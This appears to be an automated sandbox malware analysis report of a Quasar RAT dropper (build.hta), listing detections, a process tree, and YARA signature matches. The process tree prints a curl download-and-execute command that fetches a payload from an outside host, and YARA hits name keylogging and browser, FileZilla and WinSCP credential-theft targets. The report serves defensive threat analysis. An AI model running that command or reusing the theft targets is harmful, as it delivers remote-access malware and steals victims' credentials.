Edit tour

Windows Analysis Report
build.hta

Overview

General Information

Sample name:	build.hta
Analysis ID:	1454170
MD5:	81d631fdb7e6f1d8b2222355bdea0d92
SHA1:	fc5a81c0b9df522b041caf2557f152514ccfcd5c
SHA256:	d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d
Tags:	hta
Infos:

Detection

Quasar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Quasar RAT

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Yara detected Quasar RAT

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Sigma detected: Curl Download And Execute Combination

Sigma detected: Suspicious MSHTA Child Process

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7456 cmdline: mshta.exe "C:\Users\user\Desktop\build.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7600 cmdline: curl -L https://mediafire.zip/build.exe -o build.exe MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

build.exe (PID: 7720 cmdline: build.exe MD5: 05EECFC1820AB3273409323601A71F23)

csc.exe (PID: 8136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Host:Port": "OuB3'!fy.", "InstallName": "0vRva!b|>", "MutexName": "`H]\"':q", "StartupKey": "}p(3k<Y?Zi1BM", "Tag": "UnW))[Q>", "ServerSignature": "[{+'*", "ServerCertificate": "@ETksT"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3ea04:$a1: GetKeyloggerLogsResponse 0x3e165:$a2: DoDownloadAndExecute 0x50614:$a3: http://api.ipify.org/ 0x4e11d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4f46b:$a5: " /sc ONLOGON /tr "
00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3df21:$s1: DoUploadAndExecute 0x3e165:$s2: DoDownloadAndExecute 0x3dce6:$s3: DoShellExecute 0x3e11d:$s4: set_Processname 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60 0x5748:$op2: 00 17 03 1F 20 17 19 15 28 0x61ae:$op3: 00 04 03 69 91 1B 40 0x69fe:$op3: 00 04 03 69 91 1B 40
00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4ee2a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4ea3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x33dc9:$class: Core.MouseKeyHook.WinApi
00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3f39e:$a1: GetKeyloggerLogsResponse 0x3eaff:$a2: DoDownloadAndExecute 0x50fae:$a3: http://api.ipify.org/ 0x4eab7:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4fe05:$a5: " /sc ONLOGON /tr "
00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3e8bb:$s1: DoUploadAndExecute 0x3eaff:$s2: DoDownloadAndExecute 0x3e680:$s3: DoShellExecute 0x3eab7:$s4: set_Processname 0x61be:$op1: 04 1E FE 02 04 16 FE 01 60 0x60e2:$op2: 00 17 03 1F 20 17 19 15 28 0x6b48:$op3: 00 04 03 69 91 1B 40 0x7398:$op3: 00 04 03 69 91 1B 40
00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4f7c4:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4f3d8:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x34763:$class: Core.MouseKeyHook.WinApi
00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3ea04:$a1: GetKeyloggerLogsResponse 0x3e165:$a2: DoDownloadAndExecute 0x50614:$a3: http://api.ipify.org/ 0x4e11d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4f46b:$a5: " /sc ONLOGON /tr "
00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3df21:$s1: DoUploadAndExecute 0x3e165:$s2: DoDownloadAndExecute 0x3dce6:$s3: DoShellExecute 0x3e11d:$s4: set_Processname 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60 0x5748:$op2: 00 17 03 1F 20 17 19 15 28 0x61ae:$op3: 00 04 03 69 91 1B 40 0x69fe:$op3: 00 04 03 69 91 1B 40
00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4ee2a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4ea3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x33dc9:$class: Core.MouseKeyHook.WinApi
Process Memory Space: build.exe PID: 7720	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: csc.exe PID: 8136	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.build.exe.64179a.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
5.2.build.exe.64179a.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.build.exe.64179a.1.raw.unpack	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3ec04:$a1: GetKeyloggerLogsResponse 0x3e365:$a2: DoDownloadAndExecute 0x50814:$a3: http://api.ipify.org/ 0x4e31d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4f66b:$a5: " /sc ONLOGON /tr "
9.2.csc.exe.4800000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
9.2.csc.exe.4800000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.build.exe.64179a.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3e121:$s1: DoUploadAndExecute 0x3e365:$s2: DoDownloadAndExecute 0x3dee6:$s3: DoShellExecute 0x3e31d:$s4: set_Processname 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60 0x5948:$op2: 00 17 03 1F 20 17 19 15 28 0x63ae:$op3: 00 04 03 69 91 1B 40 0x6bfe:$op3: 00 04 03 69 91 1B 40
5.2.build.exe.64179a.1.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3ec04:$x1: GetKeyloggerLogsResponse 0x3ee44:$s1: DoShellExecuteResponse 0x3e7b3:$s2: GetPasswordsResponse 0x3ed17:$s3: GetStartupItemsResponse 0x3e135:$s5: RunHidden 0x3e153:$s5: RunHidden 0x3e161:$s5: RunHidden 0x3e175:$s5: RunHidden
5.2.build.exe.64179a.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4f631:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x4f867:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
5.2.build.exe.64179a.1.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3ec04:$x3: GetKeyloggerLogsResponse 0x3de5c:$x4: GetKeyloggerLogs 0x3e134:$s1: <RunHidden>k__BackingField 0x3edcc:$s2: set_SystemInfos 0x3e15d:$s3: set_RunHidden 0x3dc90:$s4: set_RemotePath 0x3202a:$s7: xClient.Core.ReverseProxy.Packets
5.2.build.exe.64179a.1.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x305c0:$x4: xClient.Properties.Resources.resources 0x30481:$s4: Client.exe 0x3e15d:$s7: set_RunHidden
5.2.build.exe.64179a.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x5161b:$x2: Process already elevated. 0x3a2d7:$x4: get_encryptedPassword 0x3e365:$x5: DoDownloadAndExecute
9.2.csc.exe.4800000.0.unpack	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3ec04:$a1: GetKeyloggerLogsResponse 0x3e365:$a2: DoDownloadAndExecute 0x50814:$a3: http://api.ipify.org/ 0x4e31d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4f66b:$a5: " /sc ONLOGON /tr "
5.2.build.exe.64179a.1.raw.unpack	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4f02a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4ec3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x33fc9:$class: Core.MouseKeyHook.WinApi
5.2.build.exe.64179a.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x4eeee:$f1: FileZilla\recentservers.xml 0x4ef2e:$f2: FileZilla\sitemanager.xml 0x4ef62:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x4e4d9:$b1: Chrome\User Data\ 0x4e53d:$b1: Chrome\User Data\ 0x4e8d0:$b2: Mozilla\Firefox\Profiles 0x4eca4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x53514:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x4ed34:$b4: Opera Software\Opera Stable\Login Data 0x4ede4:$b5: YandexBrowser\User Data\ 0x4ee56:$b5: YandexBrowser\User Data\ 0x4e684:$s4: logins.json 0x4e6d0:$s4: logins.json 0x4e9be:$s4: logins.json 0x4e1ee:$a1: username_value 0x4e20c:$a2: password_value 0x3a2af:$a3: encryptedUsername 0x3a2c5:$a3: encryptedUsername 0x3a3fb:$a3: encryptedUsername 0x3a2db:$a4: encryptedPassword 0x3a2f1:$a4: encryptedPassword
5.2.build.exe.64179a.1.raw.unpack	MALWARE_Win_QuasarRAT	QuasarRAT payload	ditekSHen	0x3ec04:$s1: GetKeyloggerLogsResponse 0x3de5c:$s2: GetKeyloggerLogs 0x4dabe:$s3: />Log created on 0x4ec3e:$s4: User: {0}{3}Pass: {1}{3}Host: {2} 0x4e31d:$s5: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x51cee:$s6: grabber_ 0x51d0a:$s6: grabber_ 0x3302a:$s7: <virtualKeyCode> 0x3e134:$s8: <RunHidden>k__BackingField 0x3305c:$s9: <keyboardHookStruct> 0x36405:$s10: add_OnHotKeysDown 0x36457:$s10: add_OnHotKeysDown 0x5067c:$ua1: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 0x50d39:$us2: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
9.2.csc.exe.4800000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3e121:$s1: DoUploadAndExecute 0x3e365:$s2: DoDownloadAndExecute 0x3dee6:$s3: DoShellExecute 0x3e31d:$s4: set_Processname 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60 0x5948:$op2: 00 17 03 1F 20 17 19 15 28 0x63ae:$op3: 00 04 03 69 91 1B 40 0x6bfe:$op3: 00 04 03 69 91 1B 40
9.2.csc.exe.4800000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3ec04:$x1: GetKeyloggerLogsResponse 0x3ee44:$s1: DoShellExecuteResponse 0x3e7b3:$s2: GetPasswordsResponse 0x3ed17:$s3: GetStartupItemsResponse 0x3e135:$s5: RunHidden 0x3e153:$s5: RunHidden 0x3e161:$s5: RunHidden 0x3e175:$s5: RunHidden
9.2.csc.exe.4800000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4f631:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x4f867:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
9.2.csc.exe.4800000.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3ec04:$x3: GetKeyloggerLogsResponse 0x3de5c:$x4: GetKeyloggerLogs 0x3e134:$s1: <RunHidden>k__BackingField 0x3edcc:$s2: set_SystemInfos 0x3e15d:$s3: set_RunHidden 0x3dc90:$s4: set_RemotePath 0x3202a:$s7: xClient.Core.ReverseProxy.Packets
9.2.csc.exe.4800000.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x305c0:$x4: xClient.Properties.Resources.resources 0x30481:$s4: Client.exe 0x3e15d:$s7: set_RunHidden
9.2.csc.exe.4800000.0.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x5161b:$x2: Process already elevated. 0x3a2d7:$x4: get_encryptedPassword 0x3e365:$x5: DoDownloadAndExecute
9.2.csc.exe.4800000.0.unpack	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4f02a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4ec3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x33fc9:$class: Core.MouseKeyHook.WinApi
9.2.csc.exe.4800000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x4eeee:$f1: FileZilla\recentservers.xml 0x4ef2e:$f2: FileZilla\sitemanager.xml 0x4ef62:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x4e4d9:$b1: Chrome\User Data\ 0x4e53d:$b1: Chrome\User Data\ 0x4e8d0:$b2: Mozilla\Firefox\Profiles 0x4eca4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x53514:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x4ed34:$b4: Opera Software\Opera Stable\Login Data 0x4ede4:$b5: YandexBrowser\User Data\ 0x4ee56:$b5: YandexBrowser\User Data\ 0x4e684:$s4: logins.json 0x4e6d0:$s4: logins.json 0x4e9be:$s4: logins.json 0x4e1ee:$a1: username_value 0x4e20c:$a2: password_value 0x3a2af:$a3: encryptedUsername 0x3a2c5:$a3: encryptedUsername 0x3a3fb:$a3: encryptedUsername 0x3a2db:$a4: encryptedPassword 0x3a2f1:$a4: encryptedPassword
9.2.csc.exe.4800000.0.unpack	MALWARE_Win_QuasarRAT	QuasarRAT payload	ditekSHen	0x3ec04:$s1: GetKeyloggerLogsResponse 0x3de5c:$s2: GetKeyloggerLogs 0x4dabe:$s3: />Log created on 0x4ec3e:$s4: User: {0}{3}Pass: {1}{3}Host: {2} 0x4e31d:$s5: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x51cee:$s6: grabber_ 0x51d0a:$s6: grabber_ 0x3302a:$s7: <virtualKeyCode> 0x3e134:$s8: <RunHidden>k__BackingField 0x3305c:$s9: <keyboardHookStruct> 0x36405:$s10: add_OnHotKeysDown 0x36457:$s10: add_OnHotKeysDown 0x5067c:$ua1: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 0x50d39:$us2: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
5.2.build.exe.64179a.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
5.2.build.exe.64179a.1.unpack	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3ce04:$a1: GetKeyloggerLogsResponse 0x3c565:$a2: DoDownloadAndExecute 0x4ea14:$a3: http://api.ipify.org/ 0x4c51d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4d86b:$a5: " /sc ONLOGON /tr "
5.2.build.exe.64179a.1.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3c321:$s1: DoUploadAndExecute 0x3c565:$s2: DoDownloadAndExecute 0x3c0e6:$s3: DoShellExecute 0x3c51d:$s4: set_Processname 0x3c24:$op1: 04 1E FE 02 04 16 FE 01 60 0x3b48:$op2: 00 17 03 1F 20 17 19 15 28 0x45ae:$op3: 00 04 03 69 91 1B 40 0x4dfe:$op3: 00 04 03 69 91 1B 40
5.2.build.exe.64179a.1.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3ce04:$x1: GetKeyloggerLogsResponse 0x3d044:$s1: DoShellExecuteResponse 0x3c9b3:$s2: GetPasswordsResponse 0x3cf17:$s3: GetStartupItemsResponse 0x3c335:$s5: RunHidden 0x3c353:$s5: RunHidden 0x3c361:$s5: RunHidden 0x3c375:$s5: RunHidden
5.2.build.exe.64179a.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4d831:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x4da67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
5.2.build.exe.64179a.1.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3ce04:$x3: GetKeyloggerLogsResponse 0x3c05c:$x4: GetKeyloggerLogs 0x3c334:$s1: <RunHidden>k__BackingField 0x3cfcc:$s2: set_SystemInfos 0x3c35d:$s3: set_RunHidden 0x3be90:$s4: set_RemotePath 0x3022a:$s7: xClient.Core.ReverseProxy.Packets
5.2.build.exe.64179a.1.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2e7c0:$x4: xClient.Properties.Resources.resources 0x2e681:$s4: Client.exe 0x3c35d:$s7: set_RunHidden
5.2.build.exe.64179a.1.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4f81b:$x2: Process already elevated. 0x384d7:$x4: get_encryptedPassword 0x3c565:$x5: DoDownloadAndExecute
5.2.build.exe.64179a.1.unpack	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4d22a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4ce3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x321c9:$class: Core.MouseKeyHook.WinApi
5.2.build.exe.64179a.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x4d0ee:$f1: FileZilla\recentservers.xml 0x4d12e:$f2: FileZilla\sitemanager.xml 0x4d162:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x4c6d9:$b1: Chrome\User Data\ 0x4c73d:$b1: Chrome\User Data\ 0x4cad0:$b2: Mozilla\Firefox\Profiles 0x4cea4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x51714:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x4cf34:$b4: Opera Software\Opera Stable\Login Data 0x4cfe4:$b5: YandexBrowser\User Data\ 0x4d056:$b5: YandexBrowser\User Data\ 0x4c884:$s4: logins.json 0x4c8d0:$s4: logins.json 0x4cbbe:$s4: logins.json 0x4c3ee:$a1: username_value 0x4c40c:$a2: password_value 0x384af:$a3: encryptedUsername 0x384c5:$a3: encryptedUsername 0x385fb:$a3: encryptedUsername 0x384db:$a4: encryptedPassword 0x384f1:$a4: encryptedPassword
5.2.build.exe.64179a.1.unpack	MALWARE_Win_QuasarRAT	QuasarRAT payload	ditekSHen	0x3ce04:$s1: GetKeyloggerLogsResponse 0x3c05c:$s2: GetKeyloggerLogs 0x4bcbe:$s3: />Log created on 0x4ce3e:$s4: User: {0}{3}Pass: {1}{3}Host: {2} 0x4c51d:$s5: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4feee:$s6: grabber_ 0x4ff0a:$s6: grabber_ 0x3122a:$s7: <virtualKeyCode> 0x3c334:$s8: <RunHidden>k__BackingField 0x3125c:$s9: <keyboardHookStruct> 0x34605:$s10: add_OnHotKeysDown 0x34657:$s10: add_OnHotKeysDown 0x4e87c:$ua1: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 0x4ef39:$us2: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
5.2.build.exe.1060000.2.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
5.2.build.exe.1060000.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.build.exe.1060000.2.unpack	Windows_Trojan_Quasarrat_e52df647	unknown	unknown	0x3ec04:$a1: GetKeyloggerLogsResponse 0x3e365:$a2: DoDownloadAndExecute 0x50814:$a3: http://api.ipify.org/ 0x4e31d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7} 0x4f66b:$a5: " /sc ONLOGON /tr "
5.2.build.exe.1060000.2.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x3e121:$s1: DoUploadAndExecute 0x3e365:$s2: DoDownloadAndExecute 0x3dee6:$s3: DoShellExecute 0x3e31d:$s4: set_Processname 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60 0x5948:$op2: 00 17 03 1F 20 17 19 15 28 0x63ae:$op3: 00 04 03 69 91 1B 40 0x6bfe:$op3: 00 04 03 69 91 1B 40
5.2.build.exe.1060000.2.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3ec04:$x1: GetKeyloggerLogsResponse 0x3ee44:$s1: DoShellExecuteResponse 0x3e7b3:$s2: GetPasswordsResponse 0x3ed17:$s3: GetStartupItemsResponse 0x3e135:$s5: RunHidden 0x3e153:$s5: RunHidden 0x3e161:$s5: RunHidden 0x3e175:$s5: RunHidden
5.2.build.exe.1060000.2.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4f631:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x4f867:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
5.2.build.exe.1060000.2.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3ec04:$x3: GetKeyloggerLogsResponse 0x3de5c:$x4: GetKeyloggerLogs 0x3e134:$s1: <RunHidden>k__BackingField 0x3edcc:$s2: set_SystemInfos 0x3e15d:$s3: set_RunHidden 0x3dc90:$s4: set_RemotePath 0x3202a:$s7: xClient.Core.ReverseProxy.Packets
5.2.build.exe.1060000.2.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x305c0:$x4: xClient.Properties.Resources.resources 0x30481:$s4: Client.exe 0x3e15d:$s7: set_RunHidden
5.2.build.exe.1060000.2.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x5161b:$x2: Process already elevated. 0x3a2d7:$x4: get_encryptedPassword 0x3e365:$x5: DoDownloadAndExecute
5.2.build.exe.1060000.2.unpack	Quasar	detect Remcos in memory	JPCERT/CC Incident Response Group	0x4f02a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"] 0x4ec3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2} 0x33fc9:$class: Core.MouseKeyHook.WinApi
